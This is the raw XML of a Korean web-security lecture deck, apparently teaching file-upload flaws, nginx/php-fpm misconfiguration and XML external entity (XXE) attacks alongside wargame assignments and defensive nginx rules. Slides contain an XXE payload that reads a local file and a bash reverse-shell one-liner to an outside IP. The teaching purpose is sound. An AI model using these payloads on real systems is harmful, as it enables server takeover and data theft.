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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="266" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="451" r:id="rId5"/>
    <p:sldId id="452" r:id="rId6"/>
    <p:sldId id="455" r:id="rId7"/>
    <p:sldId id="468" r:id="rId8"/>
    <p:sldId id="469" r:id="rId9"/>
    <p:sldId id="456" r:id="rId10"/>
    <p:sldId id="457" r:id="rId11"/>
    <p:sldId id="453" r:id="rId12"/>
    <p:sldId id="466" r:id="rId13"/>
    <p:sldId id="467" r:id="rId14"/>
    <p:sldId id="470" r:id="rId15"/>
    <p:sldId id="447" r:id="rId16"/>
    <p:sldId id="448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65" r:id="rId25"/>
    <p:sldId id="264" r:id="rId26"/>
    <p:sldId id="450" r:id="rId27"/>
    <p:sldId id="449" r:id="rId28"/>
    <p:sldId id="454" r:id="rId29"/>
    <p:sldId id="446" r:id="rId30"/>
    <p:sldId id="444" r:id="rId31"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="KoPub돋움체_Pro Bold" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="KoPub돋움체 Bold" panose="00000800000000000000" pitchFamily="2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9925" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="83" d="100"/>
          <a:sy n="83" d="100"/>
        </p:scale>
        <p:origin x="17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38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01CE3-A1A3-91F5-CE23-6C2D829DF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FEA6E-DE91-1286-2659-BD8A830E7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BBD4E-5F54-2FB8-5ABB-168B00C07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lxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>xml = """&lt;!DOCTYPE note [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM "file://flag.txt"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;note&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;to&gt;you&lt;/to&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;from&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zirajs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/from&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;heading&gt;Note&lt;/heading&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;body&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/note&gt;"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parser = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.XMLParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolve_entities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.fromstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xml.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), parser=parser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.tostring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pretty_print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True).decode())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956A8-DD90-F331-0253-7C818FEB7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83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FastCGI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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-fpm)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>127.0.0.1:9000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서 대기 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 끝나는 요청을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버로 넘긴다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취약점</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: myWebshell.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업로드 후 해당경로로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>myWebshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 요청하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 없지만 실행하게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upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>폴더는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>location ~ \.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ {return 403;} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>처럼 아예 막아놓도록 하자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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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단독으로 </a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US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발생하기도 하지만</a:t>
            </a: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webapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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기능으로 인해서 악성코드가 발현되는 경우도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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2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6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보통 이런 파일들이 저장된 곳은 실행권한이 없어야하며</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일 이름또한 해싱하거나 현재시간으로 저장한다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97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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>분이면 끝남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66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60361-AF17-78CC-7C35-4C7B28172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CCF90-6252-C33D-53CB-06BC0B8AA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24BD5-2C29-E16D-76E1-24173F4E6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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>분이면 끝남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91B1F-FFEE-9D8F-DAA1-1AFA3BA3E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22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https://www.revshells.com/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1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location ~ \.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ {return 403;}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C68D8-2402-0B8D-437F-D94E8B9A4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22C6F-5ACA-107F-3AA5-221E72805B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25DF5-4E8B-0F81-F01E-57B01AF42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location ~ \.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ {return 403;}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1A020-A152-09B4-6F52-CBE570BA2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517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lxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>xml = """&lt;!DOCTYPE note [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM "file://flag.txt"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;note&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;to&gt;you&lt;/to&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;from&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zirajs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/from&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;heading&gt;Note&lt;/heading&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;body&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/note&gt;"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parser = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.XMLParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resolve_entities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.fromstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xml.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), parser=parser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etree.tostring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pretty_print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True).decode())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6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7FA43-36F7-9D22-1F6D-B39744099083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 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hack.io/wargame/challenges/64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188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inxinc/nginx-wiki/blob/master/source/start/topics/tutorials/config_pitfalls.rs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hack.io/wargame/challenges/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&amp; XXE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웹 보안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2025.11.07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C840-1E19-652F-9577-83B80649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9F34C-4931-B930-BA05-F0E0A8D7FCA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과제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filestorage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DFB7-5F04-A322-68D6-6DA4272E83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/>
              </a:rPr>
              <a:t>dreamhack.io/wargame/challenges/643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358398-E0ED-4AAC-010D-7D216ED8C6C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80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88A5F-B632-6DCC-63B5-5F0BF8BCD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C697FB-F936-2242-C670-A83FB888C002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2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F7CA8-F255-C049-E1F1-972DC3679F85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 shell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1731A5-91C2-D997-8E7D-CD75F6EFA6B4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1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1C211-148A-6507-111E-897B9F340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2A02C-4C70-CB4E-F87D-F6578CB7105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Reverse Shell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EF2A8-29A9-BC5B-AA0A-B4AD618F20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29D541-DA03-EEC6-443E-BF2D1D8D6F0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30BADB-D662-1876-A84C-988D1C94C764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B8041C-F410-8745-5DE5-F81736BE5AF8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원격에서 쉘을 실행시킬 수 있는 것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B2EB91-3F66-092F-A148-58A39408D02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공격자가 서버의 컴퓨터를 다룰 수 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303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4FC61-A52B-1E4B-3F68-BB47D626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5395FF-0FF0-2AC4-7A94-224179B0AA6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Reverse Shell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35B42-A797-9B4D-D5E7-4B3C80ED16F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72B64F-9D91-3EB6-96F3-FAB5278A4F1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B85A2-8093-1C17-B1FF-4EBBB8605ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="788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sh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-</a:t>
            </a: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i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 &gt;&amp; /dev/</a:t>
            </a:r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tcp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/10.10.10.10/9001 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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7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1077B-7674-0C33-5C30-1FA481F6F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8B27CC-8F47-4E82-90D6-409EF5D3652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Reverse Shell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46EE-AC94-8ED3-5CFF-65F3F72B60C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Cause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36D0AD-03ED-1AE9-FCDD-8777CA6181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E3374-492F-D554-64FF-5F31468D2E76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340000"/>
            <a:chExt cx="7883998" cy="274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A0FEBF5-8413-A45F-BCC8-B9D60BEC9832}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1260000" y="2340000"/>
              <a:ext cx="7883998" cy="1664775"/>
              <a:chOff x="1260000" y="2520000"/>
              <a:chExt cx="7883998" cy="166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F972A4-A176-A9A6-9435-69C14CE02552}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1260000" y="252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1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="320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pwn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당해서 서버의 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shell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이 따임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E4B57-04A8-53CB-C3E7-7E31F8732238}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1260000" y="3600000"/>
                <a:ext cx="78839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Cascadia Mono SemiBold" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>업로드한 파일을 실행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172C5E-C042-D1F6-514B-AE0C6DF80972}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260000" y="45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업로드한 파일이 기존 파일을 덮어씀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21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BF1D-CD14-79DA-8866-ACEC0D9F5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093D92-3673-5567-A804-D292FA99D47D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XXE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0E850-EDCC-55AB-8D99-9E5E4C759BB8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Vunerable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XML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C272D-3E86-8AD5-2FA0-77B99964870E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09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6528-DEAB-BA5A-48DA-624D021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17B16-2DF9-CA77-2101-72605A34E69C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Extensible Markup Language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AB1A5-AC16-5861-BC91-B148A9D0C2D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71818-53E5-471A-6DBC-A4AF2CBA275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https://www.w3.org/TR/xml/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6E7971-EF93-8267-46FA-CAA5591B93D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648B63-E19E-62A4-992D-B6017A5D6455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7883998" cy="1664775"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7883998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D70FF7-F9AD-B8C1-3A3E-D79C9261CA52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데이터 구조를 정의하는 언어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846978-E273-FB0F-F8F2-CF9DBB8BF25B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구조화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확장성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37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1300-1E0A-C1A5-AB61-A84B11F73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BBDC91-1145-3146-7F38-FF963B0D87E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Extensible Markup Language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D0F10-3995-4D08-0F26-17126CBC335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92A3C-4339-6721-655F-B29CB8C99CBC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https://www.w3.org/TR/xml/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164CD8-1055-9113-8CBA-070B80928CC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B4AA03-E70D-CDE9-E11C-52C01656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48" y="2055412"/>
            <a:ext cx="4015104" cy="27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43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5D053-44FF-0559-2F37-F49780C2F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A392D-5F4E-6320-EFF9-E303028D46A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Extensible Markup Language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1CC25-5514-70C6-D0B9-D1C07FCC176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Basics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8D34AD-4B61-4BE2-D42E-E3E23EB201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BC76E-BC15-4650-660D-F4872CE8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68" y="1771166"/>
            <a:ext cx="4659464" cy="331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17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D95D7-2FE3-4AB6-6D65-4C265D096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483E29-1CBA-141B-5787-7A257CC11DC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Extensible Markup Language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55349-A983-7132-E621-C6597A6ABF2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Namespace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8924FC-1F97-FC20-93EA-F0A49569990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6053B-FCD9-32A4-C289-6DF2F3EB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9" y="1987787"/>
            <a:ext cx="7344002" cy="2882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BC73A-DB6D-C51A-15F0-D84CD0F41825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="6190223"/>
            <a:ext cx="3846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겹치는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element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나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attribute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구분하게 해준다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4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Upload 1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File Handling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E7ACC-E239-090B-33F3-C05BDED6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C74560-DF49-3F0D-877D-54B6FA6A9AD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DTD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3F2DC-95D9-544F-B6FC-70FBAFC6786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A0AF9-8C21-05BC-80DE-D0897EB1EB62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Document Type Definition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D2730C-3CBB-2A0F-FE07-DF298FE8550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CB660-4C30-963D-7ABE-0910EBBE6D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7883998" cy="2744775"/>
            <a:chOff x="1260000" y="2520000"/>
            <a:chExt cx="7883998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818B16-E5B9-07F9-B5DA-9DC034A02715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XML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구조를 정의할 수 있는 문법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546580-5796-DEE2-96EA-1938198FEF1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이름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엔티티 등을 정의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79ECF-77BC-4865-4159-9143C9917DBD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내부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/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외부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DTD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70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CA8CF-2091-119D-3419-372DEEC33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C4F0D0-84DA-592A-70CF-812490C89C1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DTD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554A6-C9E8-8CB2-E0DA-582861470CA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AE0AEC-344D-5CB7-D800-06FCC7C856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AFE9B-EEFF-DF50-6835-0BF0B5CE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1" y="2192662"/>
            <a:ext cx="4572000" cy="3106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3E31F-B3CF-E70D-6562-6F3B4743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69" y="2192662"/>
            <a:ext cx="4572000" cy="25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8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5172D-EB46-D49C-6B02-6FAF37745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51704A-6D59-F334-5AD0-E3FAE006C47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DTD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875BF-7A2D-3129-E55A-36E85B0E140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B4761-859D-D505-16D1-1495649F9F2E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Document Type Definition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557C20-7AD3-3C57-F420-F56FBE2027F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89DB9C-878A-9897-198B-1EDC32493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21611"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259999" y="2340000"/>
          <a:ext cx="6834430" cy="2758572"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2580481">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2276847727"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4253949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217068535"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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선언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933304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&lt;!ELEMENT&gt;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이름과 구조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90863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&lt;!ATTLIST&gt;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attribute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677807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&lt;!ENTITY&gt;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엔티티를 정의 ☆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29931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&lt;!NOTATION&gt;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데이터의 해석 방식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596923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&lt;!DOCTYPE&gt;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DOCTYPE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822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633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E062-03CF-0499-84D6-1FBD78F7C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D8782-6978-EE75-2587-BC719980EA9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00F58-6F4D-84A5-D2C8-27B5E4DBD50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471E3-E3BD-181E-EBDA-9B2E480DFC9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Document Type Definition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7639E0-D541-FE11-7BC6-B1C01872DBE1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CD6C36-AA05-1624-3957-E73E1CDD4CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259999" y="2340000"/>
          <a:ext cx="6834430" cy="2758572"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2580481">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2276847727"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4253949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217068535"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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선언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933304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&lt;!ELEMENT&gt;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이름과 구조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90863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&lt;!ATTLIST&gt;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attribute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677807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&lt;!ENTITY&gt;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엔티티를 정의 ☆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29931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&lt;!NOTATION&gt;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데이터의 해석 방식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596923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&lt;!DOCTYPE&gt;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DOCTYPE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822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349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AB8F-5489-D569-556D-4E94BA3A3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CC728F-509C-4621-9938-10D1DEF097D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과제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[Movie time table]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AB8A2-733F-153D-4417-C89F196C929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dreamhack.io/wargame/challenges/1887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E368E-F37C-8CFE-E2AE-3A0DF512CB0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Document Type Definition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BB7821-993D-D5E8-2C97-9B1AF3449736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5FA534-FDF3-40E5-CFA5-A14F32141C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259999" y="2340000"/>
          <a:ext cx="6834430" cy="2758572"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2580481">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2276847727"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4253949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217068535"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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선언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933304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&lt;!ELEMENT&gt;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이름과 구조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90863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&lt;!ATTLIST&gt;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element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attribute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677807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&lt;!ENTITY&gt;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엔티티를 정의 ☆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299312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&lt;!NOTATION&gt;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데이터의 해석 방식 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596923"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4597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&lt;!DOCTYPE&gt;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DOCTYPE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822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377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2025.11.07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5D7FF-9C11-A902-6E7D-3731539B9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43AC66-F451-23C9-99FB-66B1758143C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PHP?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31F1B-899F-C037-CD5D-2DEADE7BE11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92FA4-759C-713D-014D-603168EDBB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="6190223"/>
            <a:ext cx="394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php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webshell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은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MS Defender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삭제시킨다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C09AF-5C96-2BF5-5A06-DB46BBF17FB3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AA5E8F-20F8-82F4-15BA-F7A1E1E1BA5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6079F4-176C-006D-883C-63FD94A23D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260000" y="2340000"/>
            <a:ext cx="7884000" cy="3077668"/>
